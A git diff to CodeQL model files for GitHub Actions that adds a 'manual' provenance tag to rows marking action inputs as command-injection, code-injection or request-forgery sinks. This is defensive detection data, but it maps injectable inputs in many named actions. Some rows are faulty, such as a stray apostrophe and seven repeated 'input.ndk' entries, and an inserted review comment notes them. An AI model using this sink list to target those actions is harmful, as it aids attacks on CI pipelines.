diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
index 18297709838..d46a07dde96 100644
--- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"]
+ - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
index aeca6db0d98..2d162fbc914 100644
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -3,14 +3,14 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"]
\ No newline at end of file
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
index b9358bd2d69..fc91bacdb72 100644
--- a/ql/lib/ext/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["msys2/setup-msys2", "*", "input.install", "command-injection"]
- - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"]
\ No newline at end of file
+ - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
+ - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
index a18319954e3..8b2b4e79afa 100644
--- a/ql/lib/ext/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"]
- - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index f46c40a8f9c..2ea1fdf6855 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"]
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"]
- - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"]
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
+ - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
index 219de80c39e..21e0d819db7 100644
--- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"]
+ - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
index dc3c2739e87..bcc8ce6b80d 100644
--- a/ql/lib/ext/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nanasess/setup-php", "*", "input.php-version", "command-injection"]
+ - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
index 30679750f13..741ab37eb9b 100644
--- a/ql/lib/ext/nick-fields_retry.model.yml
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"]
- - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"]
- - ["nick-fields/retry", "*", "input.command", "command-injection"]
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
index c600e7a93b6..a9d6b80a627 100644
--- a/ql/lib/ext/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["octokit/graphql-action", "*", "input.query", "request-forgery"]
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
index ed9088c9f56..73d4df99af2 100644
--- a/ql/lib/ext/octokit_request-action.model.yml
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["octokit/request-action", "*", "input.route", "request-forgery"]
+ - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
index 988c3d5e674..fb6ae5102e1 100644
--- a/ql/lib/ext/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"]
+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
index 91a3382348c..8b29e5c9988 100644
--- a/ql/lib/ext/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"]
+ - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
index d9d15dc94b2..5a5cedcaca5 100644
--- a/ql/lib/ext/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"]
+ - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
index 6bc0467692d..12d3f23f8fd 100644
--- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"]
- - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"]
- - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
index 62dea47d818..30be564c42a 100644
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"]
- - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"]
+ - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
+ - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
index 525d0199859..13d4cfeb814 100644
--- a/ql/lib/ext/py-actions_flake8.model.yml
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"]
- - ["py-actions/flake8", "*", "input.plugins", "command-injection"]
- - ["py-actions/flake8", "*", "input.path", "command-injection"]
- - ["py-actions/flake8", "*", "input.ignore", "command-injection"]
- - ["py-actions/flake8", "*", "input.exclude", "command-injection"]
- - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"]
- - ["py-actions/flake8", "*", "input.args", "command-injection"]
+ - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
index 5aac0f89432..3043c9b30ec 100644
--- a/ql/lib/ext/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"]
+ - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
index d32c6509ad7..29d51d1bfbb 100644
--- a/ql/lib/ext/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.target", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.command", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
index c4ea326ecef..75a9650a92f 100644
--- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -3,22 +3,22 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", 
"manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 52c478dd1d4..9b0ec011fd6 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml 
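Review bot: In `reactivecircus_android-emulator-runner.model.yml` the row for `input.sdcard-path-or-size'` keeps a stray apostrophe inside the input name, so it presumably never matches the action's real input, and `input.ndk` is listed seven times where one row would do. The commit only appends the provenance column, so both carry over unchanged; the row should read `- ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size", "command-injection", "manual"]` and the repeated `input.ndk` rows should collapse to one. If the extra rows were placeholders for other inputs, those inputs are currently unmodelled sinks and are worth checking against the action's `action.yml`. The same apostrophe appears in `input.tag-prefix'` in `tripss_conventional-changelog-action.model.yml`, and duplicate rows appear for `input.url` in `veracode_veracode-sca.model.yml` and for `output.command-arguments` in `xt0rted_slash-command-action.model.yml`.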
+++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"]
+ - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
index 7213a39f992..a0c4d6f7ec5 100644
--- a/ql/lib/ext/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
index 3207c6d7521..b5d4629003b 100644
--- a/ql/lib/ext/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"]
- - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
index d00d78bcba8..4b96edeccc2 100644
--- a/ql/lib/ext/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"]
- - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"]
+ - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
+ - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index e2813105bdc..ae3ef2e2b1b 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index d6ba27a5079..079dfc1fc02 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 413f4f3058b..19edd617c67 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index a8db7e8313e..9f8d987c0af 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index d171499049a..90a18103868 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index 42361b203e0..fd484074f5c 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml 
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"]
\ No newline at end of file
+ - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
index 474b36186b0..5caaea9562e 100644
--- a/ql/lib/ext/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["snow-actions/eclint", "*", "input.args", "command-injection"]
+ - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
index 73b93dbb88a..9462b8d5bbd 100644
--- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"]
\ No newline at end of file
+ - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
index 4138b97f0fb..9b01987e1f2 100644
--- a/ql/lib/ext/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"]
+ - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
index 4ab448b04c1..10a3630ea0b 100644
--- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"]
+ - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
index 1bcbac476a8..aac20afddf5 100644
--- a/ql/lib/ext/tibdex_backport.model.yml
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tibdex/backport", "*", "input.body_template", "code-injection"]
- - ["tibdex/backport", "*", "input.head_template", "code-injection"]
- - ["tibdex/backport", "*", "input.labels_template", "code-injection"]
- - ["tibdex/backport", "*", "input.title_template", "code-injection"]
\ No newline at end of file
+ - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
